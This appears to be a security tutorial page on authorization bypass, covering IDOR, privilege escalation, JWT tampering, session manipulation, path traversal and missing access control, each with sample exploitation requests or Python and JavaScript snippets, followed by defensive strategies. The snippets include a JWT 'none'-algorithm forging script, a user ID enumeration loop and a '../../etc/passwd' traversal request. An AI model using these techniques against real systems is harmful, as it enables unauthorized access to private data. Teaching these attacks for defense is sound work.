Skip to content

Authorization Bypass Attack Vectors

Authorization bypass vulnerabilities can be exploited through various attack vectors. Understanding these vectors is essential for both offensive security testing and defensive measures.

1. Insecure Direct Object References (IDOR)

Description

IDOR occurs when an application provides direct access to objects based on user-supplied input, allowing attackers to bypass authorization and access unauthorized data.

Real-World Example

A healthcare application exposed patient records by allowing users to manipulate the patient ID parameter in the URL, leading to unauthorized access to sensitive medical information.

Code Example: Vulnerable IDOR

# Vulnerable code: No authorization check
@app.route('/api/patient/<patient_id>')
def get_patient(patient_id):
    patient = db.get_patient(patient_id)
    return jsonify(patient)

# Secure code: Authorization check
@app.route('/api/patient/<patient_id>')
@require_permission('view_patient')
def get_patient(patient_id):
    patient = db.get_patient(patient_id)
    if not current_user.can_view(patient):
        abort(403)
    return jsonify(patient)

Exploitation Example

# Normal user access
GET /api/patient/12345 HTTP/1.1
Host: healthcare-app.com
Authorization: Bearer user_token

# Attacker manipulates the patient ID
GET /api/patient/67890 HTTP/1.1
Host: healthcare-app.com
Authorization: Bearer user_token

2. Privilege Escalation

Description

Privilege escalation occurs when an attacker gains elevated access to resources that are normally protected from unauthorized access.

Real-World Example

A cloud service had a privilege escalation vulnerability where users could modify their role from "user" to "admin" by manipulating API requests.

Exploitation Code

import requests

# Normal user request
response = requests.get('https://cloud-service.com/api/user/role', 
                       headers={'Authorization': 'Bearer user_token'})
print(response.json())  # {"role": "user"}

# Privilege escalation attempt
data = {'role': 'admin'}
response = requests.post('https://cloud-service.com/api/user/role', 
                        json=data, 
                        headers={'Authorization': 'Bearer user_token'})
print(response.status_code)  # 200 - Success

3. Horizontal Privilege Escalation

Description

Horizontal privilege escalation occurs when a user gains access to resources of another user with the same privilege level.

Real-World Example

A banking application allowed users to view account details of other users by manipulating the account ID parameter.

Exploitation Example

# User A's account
GET /api/account/12345 HTTP/1.1
Host: bank-app.com
Authorization: Bearer user_a_token

# User B's account (horizontal escalation)
GET /api/account/67890 HTTP/1.1
Host: bank-app.com
Authorization: Bearer user_a_token

4. Vertical Privilege Escalation

Description

Vertical privilege escalation occurs when a user gains access to resources or functionality reserved for higher privilege levels.

Real-World Example

An e-commerce platform allowed regular users to access admin functionality by modifying the user role in session data.

Exploitation Code

# Modify session to escalate privileges
session['role'] = 'admin'
session['is_admin'] = True

# Access admin functionality
response = requests.get('https://ecommerce.com/admin/dashboard', 
                       cookies={'session': session_id})

5. API Authorization Bypass

Description

API endpoints may have inadequate authorization checks, allowing attackers to access sensitive data or perform actions without proper credentials.

Real-World Example

A mobile app API did not properly validate authorization tokens for certain endpoints, allowing unauthorized access to user data.

Exploitation Code

import requests

# Unauthorized access to admin endpoint
response = requests.get('https://api.vulnerable-app.com/admin/users')
print(response.json())  # Returns user list without proper authorization

# Bypass using empty or invalid tokens
headers = {'Authorization': 'Bearer '}
response = requests.get('https://api.vulnerable-app.com/admin/users', headers=headers)

6. JWT Token Manipulation

Description

JSON Web Tokens (JWT) can be manipulated if not properly validated, allowing attackers to bypass authorization by modifying token claims.

Real-World Example

A financial application used JWT for authorization but did not validate the token signature, allowing attackers to modify the token and gain admin privileges.

Exploitation Code

import jwt

# Original token
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwidXNlcm5hbWUiOiJqb2huZG9lIiwiaWF0IjoxNTE2MjM5MDIyLCJyb2xlIjoidXNlciJ9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"

# Decode token without verification (if app doesn't verify signature)
decoded = jwt.decode(token, options={"verify_signature": False})
decoded['role'] = 'admin'  # Modify role

# Create new token with modified claims
new_token = jwt.encode(decoded, key='', algorithm='none')
print(new_token)

7. Session Manipulation

Description

Session manipulation involves modifying session data to gain unauthorized access to resources or functionality.

Real-World Example

A web application stored user roles in client-side sessions, allowing attackers to modify their role to gain admin access.

Exploitation Code

// Modify session storage
sessionStorage.setItem('role', 'admin');
sessionStorage.setItem('isAdmin', 'true');

// Or modify cookies
document.cookie = "role=admin; path=/";
document.cookie = "isAdmin=true; path=/";

8. Path Traversal

Description

Path traversal vulnerabilities allow attackers to access files and directories outside the intended directory.

Real-World Example

A file sharing application allowed users to download files by specifying the file path, but did not properly validate the path, leading to unauthorized file access.

Exploitation Example

# Normal file download
GET /download?file=report.pdf HTTP/1.1
Host: file-share.com

# Path traversal attack
GET /download?file=../../etc/passwd HTTP/1.1
Host: file-share.com

9. Insecure Direct Object References in APIs

Description

APIs may expose internal object references that can be manipulated to access unauthorized data.

Real-World Example

A social media API exposed user IDs in responses, allowing attackers to enumerate and access other users' profiles.

Exploitation Code

import requests

# Enumerate user profiles
for user_id in range(1, 1000):
    response = requests.get(f'https://api.social-media.com/users/{user_id}')
    if response.status_code == 200:
        print(f"Found user: {user_id}")

10. Missing Function Level Access Control

Description

Missing function level access control occurs when an application does not properly restrict access to functionality based on user roles.

Real-World Example

A web application had admin functionality accessible to regular users by directly visiting admin URLs.

Exploitation Example

# Regular user访问admin功能
GET /admin/dashboard HTTP/1.1
Host: vulnerable-app.com
Cookie: session=regular_user_session

# 或者通过直接API调用
POST /admin/delete-user HTTP/1.1
Host: vulnerable-app.com
Cookie: session=regular_user_session
Content-Type: application/json

{"user_id": 123}

Defense Strategies

For each attack vector, implement corresponding defensive measures:

  1. Proper Access Control Checks: Always verify user permissions before granting access to resources.
  2. Input Validation: Validate and sanitize all user inputs to prevent manipulation.
  3. Secure Session Management: Store sensitive data server-side and use secure cookies.
  4. JWT Token Validation: Always validate JWT signatures and implement token expiration.
  5. API Security: Implement proper authorization checks for all API endpoints.
  6. Regular Security Assessments: Conduct penetration tests and code reviews to identify vulnerabilities.

By understanding these attack vectors, security professionals can better protect applications and systems from authorization bypass vulnerabilities.